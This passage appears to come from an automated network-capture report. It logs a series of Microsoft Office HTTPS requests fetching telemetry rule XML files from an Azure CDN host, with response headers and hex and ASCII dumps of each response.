                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703400" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ProgrammableSurfaces" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProgrammableSurfaces" S="M


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                            136192.168.2.44989313.107.246.43443
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-10-31 16:13:22 UTC192OUTGET /rules/rule702501v1s19.xml HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                            2024-10-31 16:13:23 UTC563INHTTP/1.1 200 OK
                                                                                                                                            Date: Thu, 31 Oct 2024 16:13:23 GMT
                                                                                                                                            Content-Type: text/xml
                                                                                                                                            Content-Length: 1415
                                                                                                                                            Connection: close
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:57 GMT
                                                                                                                                            ETag: "0x8DC582BE7C66E85"
                                                                                                                                            x-ms-request-id: 6afd71f5-301e-003f-7d9e-26266f000000
                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                            x-azure-ref: 20241031T161323Z-16849878b78km6fmmkbenhx76n00000008z000000000y8my
                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            2024-10-31 16:13:23 UTC1415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 69 6c 69 74 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e
                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Programmability.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenan


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                            137192.168.2.44989413.107.246.43443
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-10-31 16:13:23 UTC192OUTGET /rules/rule702500v1s19.xml HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                            2024-10-31 16:13:23 UTC563INHTTP/1.1 200 OK
                                                                                                                                            Date: Thu, 31 Oct 2024 16:13:23 GMT
                                                                                                                                            Content-Type: text/xml
                                                                                                                                            Content-Length: 1378
                                                                                                                                            Connection: close
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:36 GMT
                                                                                                                                            ETag: "0x8DC582BDB813B3F"
                                                                                                                                            x-ms-request-id: c032846d-701e-005c-2d58-27bb94000000
                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                            x-azure-ref: 20241031T161323Z-16849878b78qwx7pmw9x5fub1c00000007zg000000003egn
                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            2024-10-31 16:13:23 UTC1378INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 69 6c 69 74 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 67 72 61 6d 6d 61 62 69 6c 69 74 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d
                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Programmability" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProgrammability" S="Medium" />


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                            138192.168.2.44989513.107.246.43443
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-10-31 16:13:23 UTC192OUTGET /rules/rule700501v1s19.xml HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                            2024-10-31 16:13:23 UTC517INHTTP/1.1 200 OK
                                                                                                                                            Date: Thu, 31 Oct 2024 16:13:23 GMT
                                                                                                                                            Content-Type: text/xml
                                                                                                                                            Content-Length: 1405
                                                                                                                                            Connection: close
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:58 GMT
                                                                                                                                            ETag: "0x8DC582BE89A8F82"
                                                                                                                                            x-ms-request-id: 80a81280-401e-0047-19c2-2a8597000000
                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                            x-azure-ref: 20241031T161323Z-159b85dff8fprglthC1DFW8zcg00000001m0000000009c0g
                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            2024-10-31 16:13:23 UTC1405INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 6f 77 65 72 50 6f 69 6e 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65
                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.PowerPoint.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToke


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                            139192.168.2.44989613.107.246.43443
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-10-31 16:13:23 UTC192OUTGET /rules/rule700500v1s19.xml HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                            2024-10-31 16:13:23 UTC584INHTTP/1.1 200 OK
                                                                                                                                            Date: Thu, 31 Oct 2024 16:13:23 GMT
                                                                                                                                            Content-Type: text/xml
                                                                                                                                            Content-Length: 1368
                                                                                                                                            Connection: close
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
                                                                                                                                            ETag: "0x8DC582BE51CE7B3"
                                                                                                                                            x-ms-request-id: dbdc188e-001e-002b-6b28-2799f2000000
                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                            x-azure-ref: 20241031T161323Z-16849878b78xblwksrnkakc08w0000000920000000007m1d
                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            2024-10-31 16:13:23 UTC1368INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 35 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 6f 77 65 72 50 6f 69 6e 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 6f 77 65 72 50 6f 69 6e 74 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d
                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.PowerPoint" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPowerPoint" S="Medium" /> <F T=


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                            140192.168.2.44989713.107.246.43443
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-10-31 16:13:23 UTC192OUTGET /rules/rule702551v1s19.xml HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                            2024-10-31 16:13:23 UTC563INHTTP/1.1 200 OK
                                                                                                                                            Date: Thu, 31 Oct 2024 16:13:23 GMT
                                                                                                                                            Content-Type: text/xml
                                                                                                                                            Content-Length: 1415
                                                                                                                                            Connection: close
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:39 GMT
                                                                                                                                            ETag: "0x8DC582BDCE9703A"
                                                                                                                                            x-ms-request-id: 30963bf2-701e-0001-2a98-28b110000000
                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                            x-azure-ref: 20241031T161323Z-15b8d89586ffsjj9qb0gmb1stn0000000e1g0000000041sp
                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            2024-10-31 16:13:23 UTC1415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 73 6f 6e 61 6c 69 7a 61 74 69 6f 6e 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e
                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702551" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Personalization.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenan


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                            141192.168.2.44989813.107.246.43443
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-10-31 16:13:23 UTC192OUTGET /rules/rule702550v1s19.xml HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                            2024-10-31 16:13:24 UTC517INHTTP/1.1 200 OK
                                                                                                                                            Date: Thu, 31 Oct 2024 16:13:23 GMT
                                                                                                                                            Content-Type: text/xml
                                                                                                                                            Content-Length: 1378
                                                                                                                                            Connection: close
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
                                                                                                                                            ETag: "0x8DC582BE584C214"
                                                                                                                                            x-ms-request-id: 2e721fa8-901e-008f-4aca-2a67a6000000
                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                            x-azure-ref: 20241031T161323Z-159b85dff8fc5h75hC1DFWntr8000000018g000000009vuv
                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            2024-10-31 16:13:24 UTC1378INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 73 6f 6e 61 6c 69 7a 61 74 69 6f 6e 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 65 72 73 6f 6e 61 6c 69 7a 61 74 69 6f 6e 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d
                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702550" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Personalization" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPersonalization" S="Medium" />


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                            142192.168.2.44989913.107.246.43443
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-10-31 16:13:23 UTC192OUTGET /rules/rule701351v1s19.xml HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                            2024-10-31 16:13:24 UTC584INHTTP/1.1 200 OK
                                                                                                                                            Date: Thu, 31 Oct 2024 16:13:23 GMT
                                                                                                                                            Content-Type: text/xml
                                                                                                                                            Content-Length: 1407
                                                                                                                                            Connection: close
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:55 GMT
                                                                                                                                            ETag: "0x8DC582BE687B46A"
                                                                                                                                            x-ms-request-id: 5278af64-001e-0034-3fad-26dd04000000
                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                            x-azure-ref: 20241031T161323Z-16849878b7898p5f6vryaqvp580000000amg00000000c5n0
                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            2024-10-31 16:13:24 UTC1407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 66 6f 72 6d 61 6e 63 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b
                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Performance.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTok


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                            143192.168.2.44990013.107.246.43443
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-10-31 16:13:23 UTC192OUTGET /rules/rule701350v1s19.xml HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                            2024-10-31 16:13:24 UTC563INHTTP/1.1 200 OK
                                                                                                                                            Date: Thu, 31 Oct 2024 16:13:24 GMT
                                                                                                                                            Content-Type: text/xml
                                                                                                                                            Content-Length: 1370
                                                                                                                                            Connection: close
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:41 GMT
                                                                                                                                            ETag: "0x8DC582BDE62E0AB"
                                                                                                                                            x-ms-request-id: c9ef38c2-001e-002b-2fff-2599f2000000
                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                            x-azure-ref: 20241031T161324Z-15b8d89586fmhkw429ba5n22m80000000bcg0000000015xc
                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            2024-10-31 16:13:24 UTC1370INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 66 6f 72 6d 61 6e 63 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 65 72 66 6f 72 6d 61 6e 63 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20
                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Performance" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPerformance" S="Medium" /> <F


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                            144192.168.2.44990113.107.246.43443
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-10-31 16:13:24 UTC192OUTGET /rules/rule702151v1s19.xml HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                            2024-10-31 16:13:24 UTC584INHTTP/1.1 200 OK
                                                                                                                                            Date: Thu, 31 Oct 2024 16:13:24 GMT
                                                                                                                                            Content-Type: text/xml
                                                                                                                                            Content-Length: 1397
                                                                                                                                            Connection: close
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                                                            ETag: "0x8DC582BE156D2EE"
                                                                                                                                            x-ms-request-id: b4130024-d01e-0082-10a3-26e489000000
                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                            x-azure-ref: 20241031T161324Z-16849878b787bfsh7zgp804my400000008kg00000000b0bt
                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            2024-10-31 16:13:24 UTC1397INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 31 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 6f 70 6c 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 65 6f
                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702151" V="1" DC="SM" EN="Office.Telemetry.Event.Office.People.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPeo


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                            145192.168.2.44990213.107.246.43443
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-10-31 16:13:24 UTC192OUTGET /rules/rule702150v1s19.xml HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                            2024-10-31 16:13:24 UTC584INHTTP/1.1 200 OK
                                                                                                                                            Date: Thu, 31 Oct 2024 16:13:24 GMT
                                                                                                                                            Content-Type: text/xml
                                                                                                                                            Content-Length: 1360
                                                                                                                                            Connection: close
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:28:07 GMT
                                                                                                                                            ETag: "0x8DC582BEDC8193E"
                                                                                                                                            x-ms-request-id: e20e9adc-401e-0083-18ae-26075c000000
                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                            x-azure-ref: 20241031T161324Z-16849878b7828dsgct3vrzta700000000870000000008rxd
                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                            Accept-Ranges: bytes
